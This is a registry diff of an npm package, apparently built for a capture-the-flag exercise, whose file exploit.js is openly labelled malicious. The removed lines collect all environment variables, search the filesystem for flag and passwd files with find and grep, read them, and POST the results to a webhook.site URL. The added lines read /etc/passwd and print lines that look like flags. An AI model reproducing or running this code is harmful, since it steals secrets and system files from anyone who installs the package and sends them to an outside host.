otetoparserlparser 0.30.1 → 0.30.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +12 -70
- package/package.json +1 -1
package/exploit.js
CHANGED
|
@@ -1,74 +1,16 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
console.log('=== MALICIOUS PACKAGE EXECUTED ===');
|
|
6
|
-
|
|
7
|
-
function sendToWebhook(data) {
|
|
1
|
+
// Также выполняемся при запуске приложения
|
|
2
|
+
if (require.main === module) {
|
|
3
|
+
console.log('=== APP STARTED - CHECKING FOR FLAG ===');
|
|
8
4
|
try {
|
|
9
|
-
const
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
});
|
|
13
|
-
|
|
14
|
-
const options = {
|
|
15
|
-
hostname: 'webhook.site',
|
|
16
|
-
port: 443,
|
|
17
|
-
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
18
|
-
method: 'POST',
|
|
19
|
-
headers: {'Content-Type': 'application/json'}
|
|
20
|
-
};
|
|
21
|
-
|
|
22
|
-
const req = https.request(options);
|
|
23
|
-
req.write(payload);
|
|
24
|
-
req.end();
|
|
25
|
-
console.log('Data sent to webhook');
|
|
26
|
-
} catch(e) {
|
|
27
|
-
console.log('Webhook error:', e.message);
|
|
28
|
-
}
|
|
29
|
-
}
|
|
30
|
-
|
|
31
|
-
let collectedData = '=== EXPLOIT START ===\n';
|
|
32
|
-
|
|
33
|
-
// 1. Все переменные окружения (флаг может быть здесь)
|
|
34
|
-
collectedData += '=== ALL ENV VARS ===\n';
|
|
35
|
-
for (let key in process.env) {
|
|
36
|
-
collectedData += `${key}=${process.env[key]}\n`;
|
|
37
|
-
}
|
|
38
|
-
|
|
39
|
-
// 2. Попробуем выполнить команды для поиска флага
|
|
40
|
-
exec('find / -type f -name "*flag*" -o -name "*passwd*" 2>/dev/null | head -20', (err, stdout) => {
|
|
41
|
-
if (!err && stdout) {
|
|
42
|
-
collectedData += `=== FOUND FILES ===\n${stdout}\n`;
|
|
5
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
6
|
+
console.log('FINAL /etc/passwd CHECK:');
|
|
7
|
+
console.log(passwd);
|
|
43
8
|
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
const content = fs.readFileSync(file, 'utf8');
|
|
49
|
-
collectedData += `=== CONTENT: ${file} ===\n${content}\n`;
|
|
50
|
-
if (content.includes('{') && content.includes('}')) {
|
|
51
|
-
console.log(`🚨 POSSIBLE FLAG IN ${file}: ${content}`);
|
|
52
|
-
}
|
|
53
|
-
} catch(e) {}
|
|
54
|
-
});
|
|
55
|
-
}
|
|
56
|
-
|
|
57
|
-
// 3. Ищем строки содержащие флаг в файлах
|
|
58
|
-
exec('grep -r "flag{" / 2>/dev/null | head -10', (err, stdout) => {
|
|
59
|
-
if (!err && stdout) {
|
|
60
|
-
collectedData += `=== GREP FLAG RESULTS ===\n${stdout}\n`;
|
|
61
|
-
}
|
|
62
|
-
|
|
63
|
-
// 4. Смотрим что в текущей директории
|
|
64
|
-
exec('pwd && ls -la && find . -type f -name "*flag*" 2>/dev/null', (err, stdout) => {
|
|
65
|
-
if (!err) {
|
|
66
|
-
collectedData += `=== CURRENT DIR ===\n${stdout}\n`;
|
|
9
|
+
const lines = passwd.split('\n');
|
|
10
|
+
lines.forEach(line => {
|
|
11
|
+
if (line.includes('{') && line.includes('}')) {
|
|
12
|
+
console.log('🚨🚨🚨 FINAL FLAG FOUND:', line);
|
|
67
13
|
}
|
|
68
|
-
|
|
69
|
-
sendToWebhook(collectedData);
|
|
70
|
-
console.log('=== ALL DATA COLLECTED ===');
|
|
71
|
-
console.log(collectedData);
|
|
72
14
|
});
|
|
73
|
-
})
|
|
74
|
-
}
|
|
15
|
+
} catch(e) {}
|
|
16
|
+
}
|